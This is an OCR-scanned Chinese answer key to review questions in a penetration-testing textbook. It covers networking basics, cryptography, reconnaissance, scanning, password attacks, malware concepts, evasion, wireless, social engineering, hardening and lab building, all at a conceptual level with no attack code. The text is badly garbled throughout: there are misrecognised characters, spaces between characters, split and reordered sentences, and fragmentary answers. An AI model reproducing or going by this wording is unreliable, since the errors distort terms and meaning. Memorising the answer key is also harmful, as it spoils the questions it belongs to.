3. 渗透 测试 人 员 和 常见 的 名 称 还 有 道德 黑客 、 白 帽 黑客 等 。 三 个 名 称 都 是 正确 的 ， 它 
们 描述 的 是 同一 类 人 员 ( 尽 管 在 某 些 场合 有 的 人 可 能 会 就 这 些 明 显 的 近义词 展开 争论 )。 

4. CIA 三 要 素 代表 了 一 个 周密 而 有 效 的 安全 策略 所 必须 考虑 的 三 个 核心 因素 。 任 何 安 
全 计划 或 渗透 测试 都 应 考虑 系统 的 机 密 性 、 完 整 性 和 可 用 性 ， 以 及 如 何 攻 击 和 维护 这 三 个 
要 素 。 

5.， 以 下 均 属 于 网 络 犯罪 ， 身份 次 用、 服务 鳃 取 、 网 络 入 侵 或 未 经 授权 的 访问 、 社 会 
工程 、 发 布 和 /或 传播 非法 材料 、 欺 诈 、 侵 占 、 垃 圾 搜集 、 编 写 恶 意 代 码 、 未 经 授权 地 销 
毁 或 更 改 信息 、 拒 绝 服 务 (DOS) 和 分 布 式 拒绝 服务 (DDOS) 攻 击 、 网 络 骚扰 、 网 络 欺凌 、 网 
络 恐 怖 主义 。 


第 2 章 : 操作 系统 与 网 络 简介 


1. OSI 模型 是 一 种 开放 标准 ， 为 网 络 技术 定义 了 一 个 单一 、 通 用 的 模式 。 OSI 将 网 络 
上 的 服务 和 功能 分 成 七 个 独立 的 层次 ; 每 一 层 都 有 该 层 负责 处 理 的 一 组 特有 功能 。 

2.，TCP 是 一 种 面 问 连接 和 可 靠 的 协议 ， 可 保证 信息 的 传递 。 UDP 是 一 种 尽力 而 为 的 
协议 ， 无 法 提供 与 TCP 相 同 的 可 靠 性 。 由 于 存在 开销 ，TCP 在 同样 环境 中 传送 信息 的 速度 
没有 UDP 快 。 

3. MAC 地址 是 存储 在 网 络 设 备 中 的 一 个 物理 地 址 。 该 物理 地 址 对 于 每 个 网 络 设 备 是 
唯一 的 ， 并 使 用 十 六 进 制 格 式 。 

4. 公 网 IP 地 址 是 Intermet 上 任何 可 路 由 的 地 址 ， 该 地 址 必须 由 某 个 群体 注册 并 租用 。 
内 网 了 P 地 址 仅 在 局 域 网 络 中 可 用 ， 不 需要 注册 就 能 使 用 。 
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5. IP 地 址 的 主机 部 分 定义 一 个 特定 的 系统 ， 而 网 络 部 分 则 是 分 配给 网 段 的 标签 。 二 者 
共同 表明 了 流量 应 发 往 或 来 自 哪个 网 络 的 哪 台 主机 。 

6. 路 由 器 是 一 个 硬件 设备 ， 负 责 将 可 路 由 的 流量 导向 到 其 预定 目的 地 。 路 由 器 在 OSI 
模型 的 第 3 层 上 工作 。 

7. 32 位 。 


第 3 章 : 密码 学 简介 


1. 对 称 加 密 有 比 非 对 称 系统 性 能 更 好 的 优势 ， 尤 其 是 在 数据 量 很 大 时 。 

2. 算法 是 用 于 描述 执行 特定 加 密 形 式 的 一 个 公式 或 一 组 指令 。 

3. 隐 写 术 可 将 数据 隐藏 在 其 他 类 型 的 数据 中 ， 因 此 很 用。 通过 应 用 隐 写 术 ， 能 够 
隐藏 数据 ， 使 其 无 法 或 不 易 被 不 够 细心 的 检查 者 发 现 。 

4. 隐 和 写 术 提 供 了 隐藏 数 据 ， 使 其 无 法 被 观察 者 轻易 发 现 的 能 力 。 男 一 方面 ， 密 码 学 
可 有 效 地 保护 信息 ， 但 是 加 密 信 息 的 出 现 显然 意味 着 保护 或 隐藏 了 某 种 东西 ， 因 而 会 引起 
更 详细 的 检查 。 

5， 哈 希 提 供 了 一 种 验证 信息 的 状态 或 完整 性 的 方法 ， 而 非 确保 信息 不 被 未 经 授权 方 
访问 。 哈 希 在 验证 文件 或 其 他 数字 信息 的 状态 时 很 有 用 。 


第 4 章 : 渗透 测试 万 法 学 绽 述 


1， 渗 透 测试 方法 学 用 于 确保 测试 遵循 某 套 流程 并 完成 某 些 任务 。 此 外 ， 如 果 进 行 合 
规 性 测试 ， 方 法 学 还 确保 测试 符合 法 规 或 其 他 法 律 要 求 。 

2， 如 果 渗 透 测 试 是 被 要 求 作为 监管 审核 或 合 规 性 测试 的 一 部 分 ， 法 律 将 可 能 发 挥 重 
要 作用 。 未 能 遵守 特定 流程 并 按照 规范 日 程 执行 ， 可 能 会 导致 民事 和 监管 上 的 处 罚 。 

3， 取决 于 其 目标 和 设计 用 途 ， 不 同 的 方法 学 测试 步骤 会 有 所 不 同 ， 例 如 ， 针 对 
HIPAA 的 渗透 测试 中 会 有 一 些 可 能 需要 调整 流程 以 适应 的 特定 目标 。 

4， 界 定 渗透 测试 的 范围 很 重要 ， 因 为 它 可 让 客户 和 渗透 测试 人 员 了 解 测试 目标 。 界 
定 范围 的 过 程 应 力求 明确 界定 测试 的 所 有 目标 ， 以 及 测试 结束 时 预期 交付 的 成 果 。 

5， 未 经 书面 授权 进入 网 络 或 系统 的 渗透 测试 人 员 和 黑 帆 黑客 并 没有 什么 不 同 。 如 果 
测试 目标 发 生 扩展 、 更 改 或 因 其 他 原因 与 原始 目标 不 同 ， 必 须 获得 书面 许可 。 不 能 以 口头 
批准 或 请 求 代替 执行 任务 的 书面 许可 。 


第 5 章 : 情报 收集 


1. Whois 用 于 获取 域名 相关 信息 ， 包 括 所 有 权 和 注册 表 信息 ， 以 及 域名 服务 器 数据 。 
该 信息 可 用 于 识别 域 的 关键 点 ， 可 用 于 后 续 进 一 步 研究 。 


2. 时光 回调 机 可 用 于 检索 网 站 在 其 生命 周期 内 的 归档 快照 。 在 实践 中 ， 这 些 快照 可 
能 揭示 出 可 用 于 了 解 公司 情况 的 信息 ， 可 能 还 能 获得 一 些 已 被 删除 的 信息 。 

3. OSINT 代 表 公 开源 情报 ， 它 是 指 从 公开 可 用 的 来 源 收集 信息 。 OSINT 信 息 源 包括 
网 站 、 目 录 、 工 作 招 聘 广 告 和 其 他 非 秘 密 或 封闭 的 来 源 。 

4 Google 黑 客 技术 可 以 目 定义 输入 Google 搜 索 引擎 的 查询 指令 。 通 常 ， 输入 Google 的 
查询 指令 效率 并 不 高 ， 因 为 它们 只 能 从 一 般 意 义 上 查找 信息 ， 但 是 通过 Google hacking 的 
方法 ， 可 使 得 询 更 为 精确 ， 有 的 放 和 天， 从 而 更 容易 得 到 有 用 的 结果 。 

5.，Echosec 的 用 处 在 于 它 不 仅 提供 了 搜索 社交 媒体 帖子 的 能 力 ， 而 且 还 能 按照 发 帖 位 
置 进行 定位 ， 并 将 这 些 帖子 置 于 地 图 上 的 相应 位 置 。 此 外 ， 它 还 可 以 按照 社交 网 络 和 关键 
字 进 行 搜索 ， 进 一 步 提高 找 出 有 用 数据 ， 甚 至 将 其 链接 到 位 置 和 个 人 的 能 力 。 


第 6 章 : 扫描 和 枚 举 


1 当 数 据 包 超 过 传输 它 的 网 络 可 处 理 的 包 大 小 限制 时 ， 会 发 生 分 段 。 在 数据 包 超 
过 网 络 的 MTU 时 ， 它 将 被 分 段 成 较 小 的 部 分 ， 每 个 部 分 均 将 转发 到 原 数 据 包 的 预期 目的 
地 ， 并 在 此 重新 组 合 。 

2. 套 接 字 是 用 于 标识 连接 端点 的 IP 地 址 和 端口 号 的 组 合 。 

3. ping 扫 描 用 于 确定 子 网 中 的 哪些 主机 是 存活 或 称 “ 在 线 ” 的 ， 以 及 哪些 主机 未 存 
活 ， 或 称 “ 离 线 ” 的 。 在 通常 使 用 中 ，ping 扫 摘 可 用 于 扫描 ， 以 更 为 精确 地 定位 有 价值 的 
主机 。 

4 端口 扫描 用 于 识别 系统 中 开局 和 关闭 的 端口 。 当 端 口 被 识别 为 开局 或 关闭 时 ， 可 
以 进一步 检查 端口 以 确定 在 给 定 端口 上 是 否 有 一 个 正在 监听 的 服务 。 

5， 枚 举 用 于 提取 诸如 用 户 名 、 组 、 系 统 信 息 、 共 享 数 据 、 策 略 信息 、 操 作 系 统 数 
据 、 服 务 数据 等 信息 。 

6，banner 抓 取 可 揭示 正在 侦 听 给 定 端口 服务 的 信息 。 这 些 信息 可 用 于 确定 服务 的 配置 
方式 甚至 是 其 他 目标 系统 的 相关 数据 。 

7. 三 次 握手 用 于 建立 与 主机 的 TCP 连 接 。 三 次 握手 仅 发 生 在 TCP 连 接 中 ， 而 在 UDP 
连接 中 并 没有 握手 过 程 。 

8。、TCP 是 一 种 可 靠 的 面向 连接 的 协议 ， 为 连接 提供 管理 和 其 他 功能 。 UDP 是 一 种 无 
连接 和 不 可 靠 的 协议 ， 没 有 任何 管理 连接 的 能 


第 7 章 : 实施 漏洞 扫 摘 


1. 漏洞 扫 摘 旨 在 找到 系统 中 的 脆弱 点 。 但 是 漏洞 扫 才 
利用 。 
2， 目 动 化 扫描 是 一 种 可 用 于 清晰 了 解 操 作 系统 和 应 用 程序 存在 的 弱点 的 有 效 方法 。 


只 能 找到 弱点 ， 而 不 能 进行 


使 用 目 动 化 扫 摘 ， 可 以 在 短 时 间 内 生成 一 份 详细 的 报告 。 然 而 ， 该 类 型 扫 摘 的 缺点 是 它们 
只 能 找 出 固定 数量 的 、 其 设计 针对 的 已 知 漏洞 。 

3. 手动 扫描 可 以 用 精确 和 有 针对 性 的 方式 检测 系统 ， 并 且 使 扫描 有 更 高 的 灵活 性 。 

4. 此 类 扫描 需要 适当 的 攒 据 认 证 一 台 计 算 机 ， 以 在 不 需要 淮 试 进行 侵入 式 扫描 的 前 
提 下 确定 是 否 存 在 漏洞 。 

5. 漏洞 是 由 于 缺陷 或 事故 存在 于 系统 中 的 弱 扩 。 


第 8 章 : 破解 密码 


1. 由 于 诸多 原因 ， 该 密码 不 是 一 个 强 密码 。 密 码 不 应 全 部 为 大 写 ， 不 应 全 部 为 字 
母 ， 不 应 少 于 11 个 字符 。 

2. 这 是 一 种 尝试 每 个 可 能 的 字符 组 合 ， 直 到 找到 正确 的 字符 的 攻击 。 虽然 这 种 攻击 
有 成 功 的 可 能 性 ， 但 许多 现代 系统 采用 诸如 账号 锁定 和 错误 登录 计数 等 技术 以 阻止 此 类 
攻击 。 

3. 离线 攻击 是 一 种 不 依赖 于 与 目标 系统 的 交互 的 攻击 。 

4. 被 动 攻击 是 一 种 接触 目标 系统 ， 但 不 会 主动 产生 可 能 暴露 攻击 存在 的 流量 或 活动 
的 攻击 。 正 是 这 种 无 活动 特点 才能 使 其 难以 发 现 。 

5.， 在 一 个 账户 被 攻陷 并 且 其 密码 被 破解 后 ， 下 一 步 就 是 使 用 这 些 新 的 权限 来 执行 某 
些 功 能 ， 此 时 提 权 即 可 发 挥 作用 。 提 权 是 将 获得 的 访问 权限 提升 到 更 高 级 别 ， 从 而 可 以 实 
施 更 多 的 行动 的 过 程 。 


第 9 章 : 使 用 后 门 和 恶意 软件 保持 访问 权 


1. rootkit 特 别 和 危险， 因为 它们 可 以 拦截 和 啊 应 合法 的 系统 请 求 。 例 如 ，rootkit 可 以 拦 
截 来 自 防 病毒 软件 的 请 求 ， 并 且 回 复 它 系统 是 干净 的 ， 尽 管事 实 与 之 相反 。 

2. 病毒 是 一 种 设计 用 于 复制 和 感染 其 他 文件 或 更 改 宿主 系统 的 恶意 软件 。 病毒 的 例 
子 包 括 宏 病毒 、 隐 形 病毒 、MBR 病 毒 和 多 形 病 毒 。 

3. 木马 通常 依赖 社会 工程 ， 诱 使 受害 者 激活 其 载 答 。 

4. 后 门 被 植 入 系统 中 ， 作 为 以 后 快速 访问 系统 的 手段 。 

5. netcat 软 件 可 用 于 远程 连接 到 系统 ， 也 可 以 执行 其 他 类 似 的 任务 。 该 软件 不 仅 可 以 
远程 连接 到 系统 ， 还 可 以 运行 命令 和 传输 文件 。 


第 10 章 : 报告 


1. 报告 的 目标 是 以 可 呈现 和 可 理解 的 形式 同 客 户 提供 渗透 测试 过 程 中 发 现 的 信息 。 
2 由 于 渗透 测试 者 需要 做 笔记 并 撰写 报告 以 提供 给 客户 ， 因 此 写作 技巧 变 得 全 天 重 


。 渗 透 测试 者 在 加 客户 做 说 明 时 ， 应 努力 提供 清晰 和 有 组 织 的 信息 。 
3. 报告 中 包含 的 技术 信息 应 适合 受众 水 平 ， 并 将 任何 其 他 信息 作为 支持 文件 纳入 。 
4. 除了 帮助 理解 测试 结果 这 一 显而易见 的 原因 外 ， 客 户 要 求 报告 的 原因 还 有 法 律 原 
、 合 规 性 或 记录 存档 、 证 明 进 行 了 茶 项 测试 ， 以 及 判断 现 有 安全 措施 是 否 满足 需求 ， 或 
是 需要 重新 评 佑 。 
5. 使 报告 对 客户 更 具 可 读 性 、 更 加 有 用 ， 并 确保 满足 合 规 性 要 求 且 信 息 可 读 。 


烛 


加 


第 11 草 : 应 对 安防 和 检测 系统 


1. 防火墙 是 一 种 用 于 隔离 具有 不 同安 全 要 求 网 络 的 软件 或 硬件 设备 。 启 用 防火 墙 
时 ， 它 将 使 用 一 系列 规则 控制 进出 两 个 方向 的 流量 。 

2. NIDS 用 于 检测 网 络 上 的 恶意 或 可 疑 活动 。 

3. HIDS 仅 限于 其 可 以 检测 的 网 络 活 动量 。 通 常 它 可 检测 宿主 系统 接收 和 发 送 的 
连接 。 

4. 蜜 色 是 一 种 用 于 模拟 一 个 合法 系统 以 检测 攻击 的 硬件 或 软件 机 制 |。 

5$.， 基 于 知识 的 NIDS 的 缺点 在 于 ， 它 依赖 于 已 知 攻击 的 数据 库 检 测 可 疑 活 动 。 如 果 数 
据 库 未 定期 更 新 ， 则 可 能 无 法 检测 到 较 新 的 攻击 。 

6. DMZ 是 一 个 两 个 网 络 之 间 的 缓冲 区 ， 通 常 位 于 内 联网 和 Internet 之 间 。 


第 12 草 : 隐藏 踪迹 与 规避 检测 


1. 规避 是 渗透 测试 过 程 中 的 重要 考虑 因素 。 规 避 意 味 着 积极 主动 地 采取 措施 ， 以 避 
免 在 执行 测试 期 间或 之 后 被 检测 到 。 该 过 程 则 在 避免 将 信息 遗留 在 可 能 用 于 揭示 发 生 了 未 
经 授权 行为 的 系统 上 。 

2. 备用 数据 流 是 NTFS 文 件 系 统 的 一 项 功能 ， 用 于 存储 文件 的 信息 或 元 数据 。 存 储 在 
ADS 中 的 信息 可 以 包括 链接 到 另 一 个 文件 的 整个 文件 ， 但 不 会 显示 在 目录 列表 中 。 

3. 隐 写 术 提供 了 隐 茂 数据， 使 其 无 法 被 观察 者 轻易 发 现 的 能 力 。 男 一 方面 ， 密 码 学 
可 有 效 地 保护 信息 ， 但 是 加 密 信 息 的 出 现 显然 意味 着 保护 或 隐藏 了 某 种 东西 ， 因 而 会 引起 
更 详细 的 检查 。 

4. Log Parser Lizard 和 同类 实用 程序 可 使 用 复杂 的 SQL 表达 式 搜 索 日 志文 件 ， 从 而 更 
容易 发 现 有 价值 的 信息 。 


第 13 章 : 探测 和 攻击 无 线 网 络 


1. 两 者 之 间 的 最 大 也 是 最 明显 的 差异 是 有 效 工作 距离 。 大 多 数 情 况 下 ， 蓝 牙 的 有 效 
距离 仅 限于 30 英 尺 内 ， 而 Wi-Fi 有 效 距离 衬 少 为 其 三 倍 。 
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2 八木 天 线 和 平板 天 线 的 主要 区 别 在 于 平板 天 线 能 够 发 射 比 八木 天 线 更 宽 的 单 辐 
波束 。 

3. 对 消费 级 应 用 而 言 ， 蓝 牙 网 络 的 范围 通常 在 30 英 尺 以 内 。 如 果 使 用 特殊 的 天 线 或 
适配器 ， 可 以 有 效 地 将 距离 提高 到 几 干 英尺 或 以 上 。 

4. 有 许多 可 能 影响 范围 或 性 能 的 原因 ， 其 中 最 大 的 是 干扰 。 干 扰 可 能 对 无 线 网 络 产 
生 重 大 影响 ， 降 低速 度 ， 缩 小 覆盖 范围 。 

5. IoT 是 指 物 联网 ， 它 是 可 连接 到 Intermet 的 设备 的 统称 。 

6. IoT 的 最 大 问题 是 ， 大 多 数 设 备 几 乎 或 完全 没有 安全 指 施 。 


第 14 章 : 移动 设备 安全 


1. 沙 箱 可 使 应 用 程序 在 其 目 有 的 隔离 并 受 保护 的 内 存 区 域内 运行 ， 从 而 保护 应 用 程 


序 不 被 攻陷 。 
2，、Kali Linux NetHunter 是 用 于 执行 渗透 测试 的 Android 版 本 中 最 流行 的 版 本 之 一 。 
3. UnIX。 
4. SELinux 内 核 为 Android 操 作 系 统 提供 了 强大 的 安全 性 。 
>. Java。 


第 15 章 : 进行 社会 工程 攻击 


1. 使 用 其 手法 从 某 个 人 身上 读 取 或 提取 信息 的 过 程 。 

2. 权威 可 用 于 榴 吓 或 说 服 受 害 者 泄露 信息 。 

3. 社交 网 络 是 获取 信息 的 一 种 有 效 方法 ， 因 为 许多 用 户 在 社交 网 络 中 提供 个 人 信息 
和 其 他 信息 。 

4. 教育 和 培训 。 

5， 勒 索 会 非常 有 效 ， 因 为 它 可 让 受害 者 认为 若 不 满足 攻击 要 求 ， 令 人 十 座 的 个 人 秘 
蜜 或 信息 会 被 公之于众 。 


第 16 章 : 加 固 主机 系统 


1. 加 回 是 通过 移 除 系统 中 不 必要 的 服务 ， 并 按照 特定 目标 重新 进行 配置 ， 且 不 纳入 
任何 该 目标 角色 所 不 需要 的 内 容 ， 增 强 系统 的 安全 性 的 过 程 。 

2. 加 固 通 过 移 除 不 必要 的 项 目 并 重新 配置 系统 ， 减 少 了 潜在 攻击 入 口 ， 使 得 系统 更 
为 安全 。 
3. 不 能 ， 所 有 的 系统 都 需要 评估 其 弱点 和 功能 角色 ， 然 后 进行 相应 的 加 固 。 
4. 打 补 丁 可 以 消除 或 修复 系统 上 的 问题 ， 因 而 应 当 定 期 进行 。 


5. 漏洞 是 系统 中 因 缺 陷 、 事 故 或 缺乏 对 抗 手段 存在 的 弱点 。 虽 然 漏 洞 本 喘 不 是 一 个 
问题 ， 但 入 侵 者 可 以 利用 漏洞 造成 损害 。 


第 17 草 : 加 固 你 的 网 络 


1. DMZ 是 存在 于 用 户 内 网 和 外 网 间 的 外 围 网 络 。 该 网 络 结构 通常 用 于 承载 供 公 开 访 
问 的 服务 ， 如 Web 服 务 器 。 

2. 多 宿主 网 络 是 一 种 具有 三 个 或 以 上 网 络 连 接 的 防火 墙 。 

3. 基于 知识 的 IDS 是 一 种 依赖 于 已 知 攻击 数据 库 的 IDS， 该 数据 库 可 定期 下 载 和 更 新 
以 检测 新 的 攻击 。 

4. 最 常见 的 NIDS 部 署 位 置 一 般 是 不 同 网 段 中 的 有 价值 或 关键 资产 附近 ， 另 外 还 可 将 
NIDS 部 署 在 DMZ 中 ， 以 检测 进入 的 攻击 和 可 疑 活动 。 


第 18 草 : 规划 职业 成 功 之 路 


1. 一 名 渗透 测试 工作 者 应 该 考虑 建立 参考 指南 和 手册 的 资料 库 ， 以 使 自己 的 技能 与 
时 俱 进 。 使 用 电子 书 还 是 实体 书 属于 个 人 喜好 ， 但 是 电子 图 书 因 其 易于 携带 、 存 储 大 量 内 
容 而 不 需要 占用 大 量 空 间 的 优点 受到 欢迎 。 

2. 保持 技能 不 断 更 新 可 让 你 掌握 最 新 技术 和 理念 。 此 外 还 可 学 到 新 的 测试 方法 ， 并 
把 握 行业 趋势 。 

3.， 有 许多 指南 有 资格 进入 渗透 测试 人 员 的 资料 库 ， 但 操作 系统 指南 软件 手册 、 编 程 
参考 以 及 其 他 技术 项 目 和 指南 应 是 首选 。 


第 19 章 : 建立 一 个 渗透 测试 实验 室 


1. 常 被 虚拟 化 的 操作 系统 有 Windows 和 Linux， 某 些 情况 下 还 包括 Unix。 选 择 诸如 
Windows 和 Linux 操 作 系 统 的 通常 原因 是 其 高 度 普及 ， 且 易于 根据 需要 创建 或 重新 配置 测 
试 平台 。 

2. 将 操作 系统 虚拟 化 可 实现 简易 的 创建 、 重 配置 、 测 试 和 开发 。 在 物理 硬件 上 安装 
操作 系统 ， 将 在 需要 重新 安装 或 重新 配置 它们 时 ， 消 耗 时 间 和 资源 。 

3， 典 型 的 虚拟 化 可 能 会 在 尝试 与 某 些 硬件 设备 (如 无 线 网 卡 和 某 些 USB 设 备 ) 进 行 通信 
时 ， 难 以 正常 工作 。 但 是 ， 与 这 些 硬件 兼容 的 能 力 取决 于 所 用 的 虚拟 化 软件 而 有 所 不 同 。 

4. 通常 软件 在 客户 机 环境 中 仍 能 保持 正常 工作 ， 但 如 果 软 件 应 用 程序 需要 与 物理 硬 
件 直接 交互 ， 可 能 需要 进行 额外 的 工作 ， 才 能 使 其 正常 工作 。 

5.， 建立 实验 室 的 通常 原因 是 用 于 测试 ， 并 且 可 以 根据 任何 可 设想 到 的 需求 ， 定 制 环 
境 ( 例 如 模拟 客户 端的 环境 )。 


